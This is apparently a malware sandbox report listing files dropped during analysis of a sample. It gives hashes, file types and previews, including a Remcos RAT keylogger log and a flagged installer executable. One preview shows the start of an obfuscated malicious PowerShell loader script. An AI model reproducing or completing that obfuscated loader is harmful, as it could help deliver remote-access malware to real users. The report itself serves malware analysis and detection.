                                SHA-512:CC8DAA323817BE8F168F0A28D5A1F4F5F7B3BDEB643FFB37F9A2B20C822CED8E42B4CA535E6AEBEFF84C8119EF486F4631F47BA7E150E82DE4A89A16AA9DA29A
                                Malicious:false
                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.6.8.1.6.3.3.5.8.0.5.2.8.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.6.8.1.6.3.4.0.9.6.0.3.3.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.2.6.9.6.6.8.f.-.8.d.0.f.-.4.b.4.3.-.9.0.5.3.-.8.7.4.2.9.b.e.6.c.6.0.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.f.2.c.9.5.e.9.-.8.2.c.2.-.4.e.9.b.-.8.7.d.1.-.8.1.2.f.4.b.7.6.7.d.5.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.m.s.i.e.x.e.c...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.m.s.i.e.x.e.c...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.4.f.0.-.0.0.0.1.-.0.0.4.d.-.7.2.a.e.-.4.a.a.d.d.4.1.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.1.d.0.c.7.c.f.c.a.8.1.0.4.d.0.6.d.e.1.f.0.8.b.9.7.f.2.8.b.3.5.2.0.c.2.4.6.c.d.
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:Mini DuMP crash report, 14 streams, Sun Oct 6 09:47:46 2024, 0x1205a4 type
                                Category:dropped
                                Size (bytes):161124
                                Entropy (8bit):1.8387921709806796
                                Encrypted:false
                                SSDEEP:768:1zxue5EnbBcq6n0QOjD+NOk+/JRdMFGtzHyp92E:aBcH4k0JRdMFGtzHyp92E
                                MD5:F9583B5859245B290C5282029473254C
                                SHA1:FBC052D0AA31511EF54B581EBB64794D057D9D2E
                                SHA-256:788256DC81A0D1114EEBEF1F278A5FD0849BBD28BA79D7925E385F50338CD8D4
                                SHA-512:6C1BE077D16FF98931D10BEB3AE7431F8ACA2A4A2B1346C9F938E554B759FE00CE1A618CD5686BAE60518C695424FC80642060821AE7F5D628527C0A0B00EFD1
                                Malicious:false
                                Preview:MDMP..a..... ........\.g.........................#..........4....i..........T.......8...........T............Y...............-.........../..............................................................................bJ......p0......GenuineIntel...........T............\.g.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):8328
                                Entropy (8bit):3.694297801663072
                                Encrypted:false
                                SSDEEP:192:R9l7lZNiUg62x6YqA6whugmfd84rpDa89bhHp8ssfnLm:R9lnNib646YF6whugmfdRNhHp8/fi
                                MD5:54F2B9C9EE9908EF57183B5C56EF690F
                                SHA1:8E14C194D4CC74D10E71237F7DE3C0F55269CB01
                                SHA-256:B1C96D036CAF8EB980E082D67D05D97A86ED298B514605FDBC37C462227CCCB8
                                SHA-512:6B10A0699B795D972F4818B9D645B54886EF846B3EA0132D9AB0018098DE78562FC4C21A96BFAD3DD05877B9CB7F55D16A7F37D119672754CE548EFEF7CE9270
                                Malicious:false
                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.2.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...1.1.6.5...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.1.6.5.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.2.6.4.<./.P.i.
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):4790
                                Entropy (8bit):4.475263691878414
                                Encrypted:false
                                SSDEEP:48:cvIwwtl8zsHe702I7VFJ5WS2CfjkKs3rm8M4J5sgFMA+q8AFiEFBd:uILf+7GySPfUJYAOEFBd
                                MD5:5B686901E1EDD7C024F9ED8C6C4E9247
                                SHA1:70C5AFB1CCE6B076728B26C6267F32CB1232EC26
                                SHA-256:AE56E3C282CE1577AC4BF663C5114DDA694168B2A19E8F43DFF1724FB3E02CDC
                                SHA-512:E95320B743C0DAE2AFCC608F539AE7EB6D7A99BB41855AFA37190BAD420095866113548D2663F8034793D75C9808BFF1FFFB530A634E0444AB6B5F4E0AD6127F
                                Malicious:false
                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19042" />.. <arg nm="vercsdbld" val="1165" />.. <arg nm="verqfe" val="1165" />.. <arg nm="csdbld" val="1165" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="242" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="222875219" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:Mini DuMP crash report, 14 streams, Sun Oct 6 09:47:13 2024, 0x1205a4 type
                                Category:dropped
                                Size (bytes):171596
                                Entropy (8bit):1.8427787355926217
                                Encrypted:false
                                SSDEEP:384:X1PykXlkAx5HEncDtxNZ8EWW19q6EcdHLV6KwhURMfVukSI39cwCH5Mou:lBm25EncDtRWW19q6EmpcWafVpNcco
                                MD5:6E958D1F7B3EC13C0A17871D42615CAE
                                SHA1:B2C927F33CBE13F7400C70C7E76283AB40389FAE
                                SHA-256:DAB463DFC5B0E5C0D9D81A41A58394771C118BAEA3C1C40FF610B9BBE0AC664F
                                SHA-512:F7B58FCD2D00131F14AB147C1A11192FCBE89810620D38FFF57CD015B3AE0784BCD544DB221EA03D7DD8097C788FBE44FE43F464562629201353F9C839CFF372
                                Malicious:false
                                Preview:MDMP..a..... ........\.g............4............#..<............l..........T.......8...........T............Z...C.......................0..............................................................................bJ.......0......GenuineIntel...........T............\.g.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):8328
                                Entropy (8bit):3.691612959534491
                                Encrypted:false
                                SSDEEP:192:R9l7lZNiUsA6K6YqE6WIgmfxUND4rpr+89bZHp8ssfQzm:R9lnNiI6K6YB6WIgmfxUNERZHp8/f5
                                MD5:C97F29F1ACA94D773B5DAA02D35D2495
                                SHA1:ACC241BA2330C459F5099963887A6900907F9FA4
                                SHA-256:8CE63F6A2BBA85A09E458B4E14FC473F5ADB1BAA47DFF9F8467E7BBD70AA9E54
                                SHA-512:2C8371E4DC28F05A1DA8944A07CE2700018DEDBA64C3B9E46B48E1A7EE62A7DE4E1A9372C95CC724C5E51F97656DDB563876E0BDD156795A8D3977B0D258C5E4
                                Malicious:false
                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.2.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...1.1.6.5...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.1.6.5.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.2.6.4.<./.P.i.
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):4790
                                Entropy (8bit):4.4760910562810805
                                Encrypted:false
                                SSDEEP:48:cvIwwtl8zsae702I7VFJ5WS2CfjkSPms3rm8M4J5ssFfo+q8AZiEFBd:uILf/7GySPfJP5JXoqEFBd
                                MD5:4C2F6824FFE5FF9154BFB840F4FFEAFF
                                SHA1:C60042F6849B8D2D921D1B859745B99559CAC0E0
                                SHA-256:8EE4F9C8FDE8796C4B16AFACFBB672C89B795B79A5416FC14B0195F6733FB402
                                SHA-512:9920DF95BCD891D372827DB6B1CB0BEDCC0B278FE50C1A17D9AB85F007AF0DE67A686C948D40611DB7F03D94A573CAE1A42F646E02F6220D6241A7E1A38AF3B5
                                Malicious:false
                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19042" />.. <arg nm="vercsdbld" val="1165" />.. <arg nm="verqfe" val="1165" />.. <arg nm="csdbld" val="1165" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="242" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="222875218" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="
                                Process:C:\Windows\SysWOW64\msiexec.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):242
                                Entropy (8bit):3.3605062470053775
                                Encrypted:false
                                SSDEEP:6:6lJ8DS0Cb5YcIeeDAlMlJ8DS0NwR1SlJ8DS8FIbWAv:6lJ8yDecmlJ8ZlJ8PIbW+
                                MD5:D720B019BE1F03C97E325758BE4EAF08
                                SHA1:48083EE3F2769F3C87EB2CDC4D6EEA58410EB50A
                                SHA-256:FC04BF73CBA8E072D6DB3C49C194A73B4D27334A28E375944B144B6D5CD31F30
                                SHA-512:B9408A84D190F9031E58CF29D1AA628F0D2EBF6A16A61FBA6D8587B882752DADC7DC775F49ACE4FF5004DBE18B31E35151A525AF0CE4A4EA9D4B07220BCA1A98
                                Malicious:true
                                Yara Hits:
                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                Preview:....[.2.0.2.4./.1.0./.0.6. .0.5.:.4.7.:.0.9. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.2.0.2.4./.1.0./.0.6. .0.5.:.4.7.:.0.9. .R.u.n.].........[.2.0.2.4./.1.0./.0.6. .0.5.:.4.7.:.1.0. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:modified
                                Size (bytes):14744
                                Entropy (8bit):4.990428309401091
                                Encrypted:false
                                SSDEEP:384:f1VoGIpN6KQkj2qkjh4iUxehQJKoxOdB4NXp5YYo0ib4J:f1V3IpNBQkj2Ph4iUxehIKoxOdB4NZiA
                                MD5:A3F4A4CED5E4717EA59EEDAAA642F0CF
                                SHA1:EB40B4929869C8C2A8866A0F06AE166F406FE493
                                SHA-256:59B8E05483EA0D66C8F98CB27508791C4066743462559CE29BBF658DD88BEC0E
                                SHA-512:804565218357E45BBFEE9661AF75E9941B54E1B6AA656DE02E57A0842BCA8E679F2250E004B4FF7705F4A22C65F9A3A48AF9614A851D8C062DF4DA3B99A67257
                                Malicious:false
                                Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                Process:C:\Users\user\Desktop\zR4aIjCuRs.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):78853
                                Entropy (8bit):1.2455837622809836
                                Encrypted:false
                                SSDEEP:384:3xbi0gBtJQNRoJSzCkwEtgPy35L11XkHfhbW+gi9XXtdj+3IPEk3RewnMpvVGukp:3xbirBtJQN6JR+3t11XkZKU9XPELtkp
                                MD5:824141132C7447FD5FEFE32B734E91EE
                                SHA1:84631EE3FEE81D126E8129AB3E837DB105912176
                                SHA-256:8C86022F0ED34AA823A873EEA842DB85411C0A5FFC75E9A0B3F9F045471FA838
                                SHA-512:EE4BAEEC6921AB62DA9BAFD5C75276117736F8741F74936E4CEE9CFA18F47BE0D6777B3D3F9269A2E3383AAFF858B4513B69A1007E5E11B1AEB8FCEFE651440D
                                Malicious:false
                                Preview:...........C......}......................................................................................................d..............b...........q..........,........W.......................P............................................................................d.............................................................=.....,.........................U..................................................`...................N....................................y.............................j.......................................j................................7..........]............................................................\...........................A........................................................................J........................................-............................................Av..............l............w.\....................)............9.......H......t....................................................~...............................
                                Process:C:\Users\user\Desktop\zR4aIjCuRs.exe
                                File Type:ASCII text, with very long lines (3209), with CRLF, LF line terminators
                                Category:dropped
                                Size (bytes):54283
                                Entropy (8bit):5.361679605378956
                                Encrypted:false
                                SSDEEP:1536:oh9f0RLFjL+EcdjZ1vLuUX6o+tGsxj4wiInD8DeFW:ohIdC5ki6HqELW
                                MD5:B8754D46031D79E381032DC495738F37
                                SHA1:C1DFA31255DC6D514D03A4A78DFEFC38AC79F291
                                SHA-256:0AA4DFFDFDF131923B9559FADBF0CBC382C60AF309C4E075151FD73828BA631B
                                SHA-512:C7C30FD11D98B97371B0848134FF3A44758F8E3AB3E33BDA6DA18D0988A3DE56A30E80720B4C37E7878EDB672B43B7BDB2C3E0464ECA48F23A9C7F3493C8F396
                                Malicious:true
                                Preview:$Kulissen=$Maskinhandleren136;..<#untameness Defineringen Contourne Knytte Calypters #>..<#Giglet Bydelens Maximalist #>..<#Kontraktforholdet Seerband Arkivfilmens Formidlinger Agreers Geobotaniker #>..<#Tectorial Telefonbeskeder Glosens Tortur Miljfremmedes Plastiks #>..<#Ungenius Licenceless Enigt #>..<#Rouletterne Doty Tubule Logometrical Epoxyharpiksernes Organizabilities Anklangens #>...$Paany = @'. Sylv..tomi$ForetV Kul e,picigUndereB uget hyse Pascr Subje Eli.d S reeF strsZo.ma3Depe,4Krymm=Ka.hi$DisguFForhajCabale r,jenAmtetdCharas Ebu,kTr ubaPrecibConjuedehumtJu.tasO nern.utbenKart u C.pslXeroplContewElectl PupirDammu;flyve.PletsfIndrmuJ.dicnMicr.cDeutet Treti blegoSndern Dich AlumiPMi prr .onoeProprc Reimo iksmSkifemfusiou actn Emoti gargcDyhrraRabartSkyldiIlluso ilamnSacch dukk( erre$ Y koF Duc jBlom,eSy.ptnTutordFllessAfflukbe laaNlderbYlva e BlactTalkasIrres,Win o$MormoC W.rpo InquhBeskfi,ndemb .onpiUn.ertBomlriDeposvTorsoeBkken)Bog,i egal{ unsy.Sto,m.sylds$ FlagDfribb
                                Process:C:\Users\user\Desktop\zR4aIjCuRs.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):384624
                                Entropy (8bit):1.248833521425474
                                Encrypted:false
                                SSDEEP:1536:W6cz0sUWiVbCEoc9wgvpThh7bVWBYRM1XQpOD:cIzpxHvphhVWBCw8OD
                                MD5:9B6ACDA0C5F46046E385C0790128D0C2
                                SHA1:6BD58E2F72155950922FFC3C834569C4170A19CB
                                SHA-256:0A8A0437AE28DB331634876CE10D4CD83282F8F157C88D4AC91BBFC7102AC727
                                SHA-512:028F16C856B926C9BAC6569F6EED0EE943CC9522B6301930DDC571E2314F11955D79FEA2B64DE3A332BC99A165A9FD81A97E2F216F3B5F5DBF19719159D2B142
                                Malicious:false
                                Preview:......................................................................................................Y........................................7...............................x................................................J).............................................................................................*.....I................................................................C..........."..............0...........................C........................................................................................."......................................^..........................9.........D........................................f.............w................................./.....................>.................................#..................................................A.............I.............p............................................m..................k........................................................).........................................*.
                                Process:C:\Users\user\Desktop\zR4aIjCuRs.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):129475
                                Entropy (8bit):1.2572241713566128
                                Encrypted:false
                                SSDEEP:768:8NDyIGIJQJn7z1buGQfGc5yItzeF6/57P6lkcjp1lhlOh/6fCT3:HJ7u9aVf0Jx3
                                MD5:438EC0B53BC58AFA50B6C67950DF66D3
                                SHA1:39BC09893AE86854F4A9204D5E75CF02A8B7E8FF
                                SHA-256:E89BFD83D25FD03FDBA5D94B3D2E7F3A06F3EEA6D538FD397EBAFF4252EAE941
                                SHA-512:195A2BDAA2F6D1B8C1E4B7ED5856D26818B8B142688EE33CB245084938F56D7E08930194D7CD15BCDE0BB8956CF0A15C34E05ADA06C25EEA98D6FC9250CB966B
                                Malicious:false
                                Preview:..................-...............................................................................................................................................N..................(....................................................I.....................................}'........-........................................................%.....................................................U.............-..."........................P................................#......f....9.............................5..M........e.......................s.................................................................................c...................................I.................W.................................G.B...............c......................U...................\..................................................................................................................................&......[..................O.....................i...............................@.........
                                Process:C:\Users\user\Desktop\zR4aIjCuRs.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):313594
                                Entropy (8bit):7.718949917493243
                                Encrypted:false
                                SSDEEP:6144:dVhXa+OFcyNokRx6hV+eIskuCQvw8c1SE1lZkhyE3AAcYtK7CNxXf0f8DEWktAb0:RDkRxShL/usE1nyy+WCN2f9htAFHlRm
                                MD5:B94F573B2BD801105D4A2F06933D5770
                                SHA1:FEEA08423EE946072A97F702B633623C605CA03D
                                SHA-256:2CDB0341A8A218F53C689CB81512C87B11E71E56D2E4709EDBBCEB2A81B5D5C4
                                SHA-512:C90549B027A0105D8376232C71E7897B6581079254B026748EC640D38CA165BEE1DB6FDD35702489A0555FC864A4887ADBD2B4C7A057B07D9913FF10CBC1296C
                                Malicious:false
                                Preview:......ccc...b.b..................................^^........d...........ddd.##.................................e....IIII...#.....C.....g..................9999.333.........444.....U.-.'...4......{.<<<<<....2.::.!...........v.....__..!!...........A............HH............./............w...........}}...................S...........>>>>>.a................&&.....N....6............s..8.......yy...(................g...........00..........,.....l.}}...........................tttttt............KK...(.....3.f.........0.^^........................................v.......(....^..u.............q...l...........||.....$$$.......................#.?.....................$.....................O..................1.....).................|||..$$............VVVV........0........+........`.........sss.`..................].I.............................?.................]]...............................k..........b..........""".....]]]......G................&&.............``.........f..33..BB.....C.............
                                Process:C:\Users\user\Desktop\zR4aIjCuRs.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):209545
                                Entropy (8bit):1.2697940266141337
                                Encrypted:false
                                SSDEEP:768:GB9fz0i3eSF6qok2kiuGuccV7/BZWgd1LadtY5w7PJsQpEINlaiBVtM6F8+AXF6N:14sJhOhiKT6vV
                                MD5:AD805DD3CCD4E51E794B31FECB308E37
                                SHA1:60A468E13054100E7171AC9EBCFC6ACC11ECEFE4
                                SHA-256:C23B6450A4D80F70F25449D74B945A1B889CAEDE1881359A1A4934AC2C947D0F
                                SHA-512:ECCCA66ED902438B2EC4B9AD16C0A0EBC6DD1287817714CD7B1C4222B2FE17746D167327AB445CEA38D6C15ECA66ADDE913698AFAD999C7D17CA67B037F7BC7F
                                Malicious:false
                                Preview:.........................].................O..E............................s......................x...<......................................S...........................\....................................................p..............).........................................................................................}.......................................................6.................................................<............................;.......................................................... ........................................(.........P............................<........................................j..............7.................................y..q...............................,<......................+......................(........._...............S....j................................@......................................2................n.........4.........................f........................................................C.............
                                Process:C:\Users\user\Desktop\zR4aIjCuRs.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):163471
                                Entropy (8bit):1.2547111118094014
                                Encrypted:false
                                SSDEEP:768:Xyj8YpMGWHC57RDcZ3RcixTn9scZB+eTEHlhv9T6j+XbGkO/1eu5qV5D0jB43:Xr+eZwITkqq29
                                MD5:76003043201C6410C1D4B56A1357B6DF
                                SHA1:43BD7B9D6BFD3354C40358847994BA8B241F7252
                                SHA-256:387143B793C16EF84FF29AEF4D62E252ADCC59EADC3912800BF1118013392BFA
                                SHA-512:C180C254C16B7FF4D27D1823F49D8830A8E6FC24FC49366605433521FF10A7DB5A056A12C9576738973E8089813616FE899AE88F46CE10C4AB54E9C2DCDA5374
                                Malicious:false
                                Preview:.......H..........................................#y...................................s....................".p...................................0...........3........................................1.................R...................................2......................................................4.................4.......................................................................................................}..Q....................................................................g.J.......................................d.......]........................R...............b.................................................................R.....c...............;..................................n...........................G...............5..........6...?.......................&.......................................^..............................................................................................~...............4.........................+............[.....)@...
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                Category:dropped
                                Size (bytes):776478
                                Entropy (8bit):7.022322453988849
                                Encrypted:false
                                SSDEEP:12288:HQIoWuLS5jMYG1kqqGDFL34Od2l2QrClyxzwsNZU18Do9I4jMSPM:H7uLS5jtGTDFoOd2YQIyZfZ74jvM
                                MD5:02F086FB54D58BF17B51564B34166F5E
                                SHA1:6AD69C9BDAFB1A4CA5C0D15836B3E0ABDD0A1E62
                                SHA-256:2AC935868A1F972E5A036986147051402E1B656A5AC9AC4B8CA15252F14E15FD
                                SHA-512:D34CEB0A5835C88F3D10A3E2E31F0E91A71809C5C514A1D2573C5A126E51F5BD4EF1F4F41B166F468D2222B6D0ABF04871109A3450F039EB4A577B9067C02AFA
                                Malicious:true
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 79%
                                • Antivirus: Virustotal, Detection: 69%, Browse
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L...<.oZ.................h...........3............@.......................................@.......................................... ...............................................................................................................text...'f.......h.................. ..`.rdata...............l..............@..@.data...............................@....ndata.......P...........................rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................
